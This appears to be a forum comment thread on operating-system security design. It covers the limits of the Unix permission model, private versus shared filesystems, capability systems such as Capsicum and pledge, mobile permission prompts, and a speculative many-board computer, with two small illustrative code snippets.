                                                                    The *nix permissions model was designed to deal with a single shared machine with a lot of users and everything-is-a-file. The modern use case is a single machine with a single user and the need for semantic permissions rather than file-level permissions.

                                                                    1. 16

                                                                      This is very insightful, and definitely has changed the way that I’m thinking about security for my OS design.

                                                                      Here’s the thought that I got while reading your comment: “The original UNIX security model was one machine, many users, with the main threat being from other users on the machine. The modern security model is (or should be) one machine, one user, but multiple applications, with the main threat being from other/malicious applications being run by that single user.”

                                                                      1. 9

                                                                        To make one small tweak to your statement, I would propose the modern model be “many machines, one user, with multiple applications…”. The idea being with those applications you will be dealing with shared risk across all of the accounts you are syncing and sharing between devices. You might only be controlling the security model on one of those machines, but the overall security risk is likely not on the one you have control over and that may make a difference. Do you let applications sync data between every device? Does that data get marked differently somehow?

                                                                        1. 3

                                                                          If you are planning some standard library/API, please also consider testability. For example, a global filesystem with a “static (in the OOP sense)” API makes it harder to mock/test than necessary. I think the always-available API surface should be minimized, to provide APIs which can be tested, secured and versioned more easily, with more explicit interactions and failure modes than the APIs we are used to.

                                                                        2. 10

                                                                          This is the reason why Plan 9 completely removed the concept of a “root” user. It has a local account used to configure the server, which nevertheless cannot access the server’s resources; users connect to it and are granted permissions by a dedicated permission server (which could be running on the same machine). It is much cleaner when the machine is part of a larger network, because users are correctly segregated and simply cannot escalate their privileges: they would need access to the permission server to do that.

                                                                          1. 14

                                                                            I agree, and would like to extend it with my opinion:

                                                                            A global shared filesystem is an antipattern (it is a cause of security, maintenance and programming problems/corner cases). Each program should have private storage, and sharing data between applications should be well regulated, either by (easily) pre-configured data pipelines or with interactive user consent.

                                                                            Global system services are also an antipattern. APIs that suggest services are always available by default, with unavailability as an edge case, are an antipattern too.

                                                                            Actually, modern mobile phone operating systems are gradually shifting away from these antiquated assumptions, and have the potential to be much more secure than existing desktop OSs. These ideas won’t reach the mainstream UNIX-worshipping world. On the desktop, Windows is moving in this direction, e.g. desktop apps packaged and distributed via the Microsoft Store each run in separate sandboxes (I had quite a hard time finding my HexChat logs), but Microsoft’s ambition to please Mac users (who think they are Linux hackers) is slowing the adoption (looking at you, winget, and the totally mismanaged Microsoft Store with its barely working search and non-scriptability).

                                                                            1. 10

                                                                              Global shared filesystem is an antipattern (it is a cause of security, maintenance, programming problems/corner cases).

                                                                              If your only goal is security, this is true. If your goal is using the computer, then getting data from one program to another is critical.

                                                                              Actually modern mobile phone operating systems are gradually shifting away from these antiqued assumptions, and are having the potential to be much more secure than existing desktop OSs.

                                                                              And this (along with the small screens and crappy input devices) is a big part of why I don’t do much productive with my phone (and the stuff I do use for it tends to be able to access my data, eg – my email client).

                                                                              1. 4

                                                                                Actually, I have seen many (mostly older) people for whom the global filesystem is a usability problem. It is littered with stuff that is uninteresting to them: when pressing the “attach picture” button on a website they just want to see their pictures, not the programs, the music, /boot or C:\Windows, etc…

                                                                                It also creates unnecessary programming corner cases: if your program wants to create a file named foo, another process may create a directory with the same name in the same location. There are conventions to lower this risk, but it is still an unnecessary corner case.
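
                                                                                That corner case is easy to demonstrate in Ruby, using a temp directory and playing both processes ourselves:

```ruby
require "tmpdir"

Dir.mktmpdir do |dir|
  path = File.join(dir, "foo")
  # "Another process" wins the race and creates a directory named foo...
  Dir.mkdir(path)
  # ...and now our perfectly reasonable file write fails.
  begin
    File.write(path, "data")
  rescue SystemCallError => e
    puts "write failed: #{e.class}" # Errno::EISDIR on Linux
  end
end
```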

                                                                                Getting data from one place to another can be solved a number of ways without a global filesystem. For example, you can create a storage location and share it with multiple applications, though this still has the corner cases I mentioned above. Android does provide a globally shared storage for this task, which is not secure, though at least accessing it requires an explicit permission. You can also specifically share data from one app to another without any filesystem at all, as with Android’s Activities and Intents.

                                                                                I think there are proven prototypes for these approaches, though I think the everything-is-a-file approach is also a dead end in itself, which further limits the need for a “filesystem”.

                                                                                Note: the best bolted-on security fix to the traditional UNIX filesystem seems to me to be the OpenBSD pledge approach; too bad OpenBSD has other challenges which limit its adoption. I also like the sandbox-based approaches, but then I’d rather go a few steps further.

                                                                                1. 2

                                                                                  Getting data from one place to another can be solved a number of ways without global filesystem. […] Android does provide a globally shared storage for this task, which is not secure, its access needs explicit privilege at least.

                                                                                  That is a great example of how hard it is to find the right balance between being secure and not nagging the user.

                                                                                  In order not to bother the users too much or too often, Android will ask a simple question: do you want this app to access none of your shared files (but I want this funny photo-retouch app to read and modify the three pictures I took ten minutes ago) or do you allow it to read all your shared files (and now the app can secretly upload all your photos to a blackmail/extortion gang). None of these two options are really good.

                                                                                  The alternative would be fine-grained access, but then the users would complain about having too many permission request dialogs.

                                                                                  In the words of an old Apple anti-Windows ad: «You are coming to a sad realization: cancel or allow?»

                                                                                  1. 5

                                                                                    Meanwhile on iOS you can use the system image picker (analogous to setuid) to grant access to select files without needing any permission dialogs.

                                                                                    1. 1

                                                                                      This is a valid option on Android as well

                                                                              2. 6

                                                                                I disagree. Having files siloed into application-specific locations would destroy my workflow. I’m working on a project that includes text documents, images and spreadsheets. As an organization method, all these files live under a central directory for the project as a whole. My word processor can embed images. The spreadsheet can embed text files. This would be a nightmare under a siloed system.

                                                                                A computer should adapt to how I work, not the other way around.

                                                                                1. 7

                                                                                  In a properly designed silo’d filesystem, this would still be perfectly possible. You’d just have to grant each of those applications access to the shared folder. Parent is not suggesting that files can’t be shared between applications:

                                                                                  sharing data between application should be well regulated either by (easily) pre-configured data pipelines, or with interactive user consent.

                                                                                  1. 1

                                                                                    You could even create security profiles, based on projects, with the same applications having different sets of shared access patterns depending on the profile.

                                                                                    It could be paired with virtual desktops, for example, to have a usable UX for this feature. I’d be happy in my daily work when shuffling projects, to have only the project-relevant stuff in my view at a time.

                                                                                2. 3

                                                                                  Global shared filesystem is an antipattern

                                                                                  I’d make that broader: A global shared namespace is an antipattern. Sharing should be via explicit delegation, not as a result of simply being able to pick the same name. This is the core principle behind memory-safe languages (you can’t just make up an integer, turn it into a pointer, and access whatever object happens to be there). It’s also the principle behind capability systems.

                                                                                  The Capsicum model retrofits this to POSIX. A process in capability mode loses access to all global namespaces: the system calls that use them stop working. You can’t open a file, but you can openat a file if you have a directory descriptor. You can’t create a socket with socket, but you can receive a file descriptor for a new socket over a socket you already have. Capsicum also extends file descriptors with fine-grained rights so you can, for example, delegate append-only access to a log file to a process, but not allow it to read back earlier log messages or truncate the log.

                                                                                  Capsicum works well with the Power Box model for privilege elevation in GUI applications, where the Open… and Save… dialog boxes run as more privileged external processes. The process invoking the dialog box then receives a file descriptor for the file / directory to be opened or a new file to be written to.

                                                                                  It’s difficult to implement in a lot of GUI toolkits because their APIs are tightly coupled with the global namespace. For example, by returning a string object representing the path from a save dialog, rather than an object representing the rights to create a file there.

                                                                                  1. 3

                                                                                    I think that snaps (https://snapcraft.io/) have this more granular permission model, but nobody seems to like them (partially because they’re excruciatingly slow, which is a good reason).

                                                                                    1. 2

                                                                                      Yeah, Flatpak does this too. It’s why I’m generally on board with Flatpak, even though the bundled library security problem makes me uncomfortable: yes they have problems, but I think they solve more than they create. (I think.) Don’t let perfect be the enemy of good, etc.

                                                                                    2. 3

                                                                                      Global shared filesystem is an antipattern (it is a cause of security, maintenance, programming problems/corner cases). Each program should have private storage capability, and sharing data between application should be well regulated either by (easily) pre-configured data pipelines, or with interactive user consent.

                                                                                      I would not classify a global shared filesystem as an antipattern. It has its uses, and for most users it is a nice metaphor. As with all problems that are not black or white, what is needed is to find the right balance between usefulness, usability and security.

                                                                                      That said, I agree on the sentiment that the current defaults are “too open”, and reminiscent of a bygone era.

                                                                                      Before asking for pre-configured data pipelines (hello selinux), or interactive user consent (hello UAC), we need to address real-world issues that users of Windows 7+ and macOS 10.15 know very well. Here are a couple of examples:

                                                                                      • UAC fatigue. People do not like being constantly asked for permission to access their own files. “It is my computer, why are you bothering me?” «Turn off Vista’s overly protective User Account Control. Those pop-ups are like having your mother hover over your shoulder while you work» (from the New York Times article “How to Wring a Bit More Speed From Vista”)
                                                                                      • Dialog counterfeits. If applications have the freedom to draw their own widgets on the screen (instead of being limited to a fixed set of UI controls), then applications will counterfeit their own “interactive user consent” panel. (Zoom was caught faking a “password needed” dialog, for example). Are we going to forbid apps from drawing arbitrary shapes or do we need a new syskey?
                                                                                      • Terminal. Do the terminal and the shell have access to everything by default, or do you need to authorize every single cd and ls?
                                                                                      • Caching. How long should authorization tokens be cached? For each possible answers there are pros and cons. Ask administrators of Kerberos clusters for war stories.
                                                                                      1. 4

                                                                                        If you insist on a global filesystem (at this imaginary OS design meeting we are at), I’d rather suggest two shared filesystems, much like how a Harvard architecture separates code and data: one for system files and application installs, and one for user data.

                                                                                        By pre-configured data pipelines I’d rather imagine something like Genode’s Sculpt (https://genode.org/). I’d create “workspaces” using the virtual desktop metaphor, configurable in an overlay where apps (and/or their storage spaces, or dedicated storage spaces) appear as graph nodes that can be linked graphically via “storage access” typed links.

                                                                                        On a workspace for ProjectA and its related virtual desktop, I could give the Spreadsheets, Documents and Email apps StorageRW links to the ProjectAStorage object. Access to this folder could even be made the default in the given security context.

                                                                                        Regarding the terminal: I don’t think it’s a legitimate use case to have access to everything just because you use a text-based tool. Open a terminal in the current security context.

                                                                                        Regarding the others: stuff can be tuned, and once compartmentalization is made user-friendly, stuff gets simpler. Reimagining things from a clean sheet would be beneficial, as backward compatibility costs us a lot; I’d argue maybe more than it gains us.

                                                                                        With SELinux my main problem is its bolted-on nature and the lack of easy, intuitive configuration, which is worsened by the lack of permission/ACL/security-context inheritance in Unix filesystems. Hello, relabeling after extracting a tar archive…

                                                                                        On the other points I partly agree: they are continuously balancing these workflows and fighting abuse (a11y features were abused on Android, leading to some features being disabled to prevent fake popups, if I recall correctly).

                                                                                    3. 4

                                                                                      A while ago I dreamed up – but never really got around to trying to build one (although I do have a few hundred lines of very bad Verilog for one of the parts) – an interesting sort of machine, which kind of takes this idea to its logical conclusion, only in hardware. Okay, I didn’t exactly dream it up, the idea is very old, but I keep wondering what a modern attempt at it would look like.

                                                                                      Imagine something like this:

                                                                                      • A stack of 64 or so small SBCs, akin to the RPi Zero, each of them running a bare-metal system – essentially, MS-DOS 9.0 + exactly one application :)…
                                                                                      • …with a high-speed interconnect so that they can pass messages to/from each other …
                                                                                      • …and another high-speed interconnect + a central video blitter, that enables a single display to show windows from all of these machines. Sort of like a Wayland compositor, but in hardware.

                                                                                      Now obviously the part about high-speed interconnect is where this becomes science fiction :) but the interesting parts that result from such a model are pretty fun to fantasize about:

                                                                                      • Each application has its own board. Want to run Quake V? You just pick the Quake V cartridge – which is actually a tiny computer! – and plug it in the stack. No need to administer anything, ever, really.
                                                                                      • All machines are physically segregated – good luck getting access to shared resources, ‘cause there aren’t any (in principle – in my alternate reality people haven’t quite figured out how to write message-passing code that doesn’t suffer from buffer overflows, I guess, and where a buffer can be overflown, anything can happen given enough determination).
                                                                                      • Each machine can come with its own tiny bit of fancy hardware. High-resolution, hi-fi DAC for the MP3 FLAC player board, RGB ambient LEDs for the radio player, whatever.
                                                                                      • Each machine can make its own choices in terms of all hardware, for that matter, as long as it plays nice on the interconnect(s). The “Arduino Embedded Development Kit” board, the one that runs the IDE? It also sports a bunch of serial ports (real serial ports, none of that FTDI stuff), four SPI ports, eight I2C ports, and there’s a tiny logic analyzer on it, too. The Quake V board is probably mostly a CPU hanging off two graphics cards in SLI.

                                                                                      I mean, with present-day tech, this would definitely be horrible, but I sometimes wonder if my grandkids aren’t going to play with one of these one day.

                                                                                      Lots and lots and lots of things in the history of computing essentially happened because there was no way to give everyone their own dedicated computer for each task, even though that’s the simplest model, and the one that we use to think about machines all the time, too (even in the age of multicore and big.LITTLE and whatnot). And lots of problems we have today would go away if we could, in fact, have a (nearly infinite) spool of computers that we could run each computational task on.

                                                                                      1. 3

                                                                                        I would, 100%, buy such a machine.

                                                                                        I seem to recall someone posted onto lobste.rs something about a “CP/M machine of the future” box a while back: a box with 16 or 32 Z80s, each running CP/M and multiplexing the common hardware like the screen. Sounds similar in spirit to what you’re describing, maybe.

                                                                                        1. 3

                                                                                          This reminds me of GreenArrays, even if there are major differences.

                                                                                          1. 2

                                                                                            The EOMA68 would probably have benefited from this idea. They were working on a compute engine in CardBus format that could be exchanged…

                                                                                            1. 1

                                                                                              What could we call the high-speed interconnect?

                                                                                              Well, it’s an Express Interconnect, and it’s for Peripheral Components, so I guess PCIE would be a good name.

                                                                                              It could implement hot-swapping, I/O virtualization, etc. for the “cartridges” (that’s a long word, let’s call them “PCIE cards”).

                                                                                              1. 1

                                                                                                I think I initially wanted to call it Infiniband but I was going through a bit of an Infiniband phase back when I first concocted this :).

                                                                                            2. 2

                                                                                              Sounds to me like an object capabilities system with extra segregation of users. Would that be a fair assessment?

                                                                                              1. 3

                                                                                                I think, in my mental model, it would be a subset or a particular instance of an object capabilities system.

                                                                                              2. 2

                                                                                                (I know Qubes does something like this, but its mechanism is different from what I’m describing here.)

                                                                                                Can you elaborate on how it’s different? What you’re describing sounds exactly like Qubes.

                                                                                                1. 2

                                                                                                  Let me preface this with “I may be completely wrong about Qubes.”

                                                                                                  From what I understand, Qubes is a single-user operating system with multiple security domains, implemented as different virtual machines (or containers? I don’t remember).

                                                                                                  In my idea, different users, if any, run in different virtual machines under a hypervisor. Each user runs a little single-user operating system. That single-user system has a single security domain under which all applications run, but applications are granted certain capabilities at runtime and are killed if they violate them. So all the applications are in the same security domain but are accorded different capabilities (I had used OpenBSD’s pledge as an example, which isn’t quite like a classic capability system but is definitely in the same vein).
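To illustrate the pledge-style model being described, here is a minimal sketch in Python of the “declare capabilities up front, get killed on the first violation” behaviour. The class and names are invented for illustration; OpenBSD’s real pledge(2) is a C syscall that delivers SIGABRT, not a Python API:

```python
# Hypothetical sketch: each app declares its capabilities at launch, and the
# "kernel" terminates it on the first request outside that set (rather than
# merely denying the request), mirroring pledge's kill-on-violation semantics.

class CapabilityViolation(Exception):
    pass


class App:
    def __init__(self, name, capabilities):
        self.name = name
        self.capabilities = frozenset(capabilities)
        self.alive = True

    def request(self, capability):
        if not self.alive:
            raise RuntimeError(f"{self.name} has already been killed")
        if capability not in self.capabilities:
            # Violating apps are killed outright, not just refused.
            self.alive = False
            raise CapabilityViolation(f"{self.name}: '{capability}' not pledged")
        return True


editor = App("editor", {"stdio", "rpath"})
editor.request("rpath")          # fine: read access was pledged

try:
    editor.request("inet")       # network was never pledged -> app is killed
except CapabilityViolation:
    pass
assert not editor.alive          # the violating app no longer runs
```

The kill-on-violation choice is what keeps all apps in one security domain manageable: a misbehaving program can’t probe for holes, because its first out-of-bounds request ends it.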

                                                                                                  In my mind, it’s basically a Xen hypervisor running an instance of HaikuOS per user, with a little sandboxing mechanism per app. There are no per-file permissions or ownership, but rather application-specific limitations as expressed by the sandbox program associated with them.

                                                                                                  The inspiration was VM/CMS, in its original incarnation where CMS was still capable of running on the bare metal; if your machine doesn’t have multiple users you can just run the little internal single-user OS directly on your hardware. Only on physically shared machines would you need to run the hypervisor.

                                                                                                2. 2

                                                                                                  It’s obviously a different approach, but very fine-grained permissions are a feature of recent macOS releases.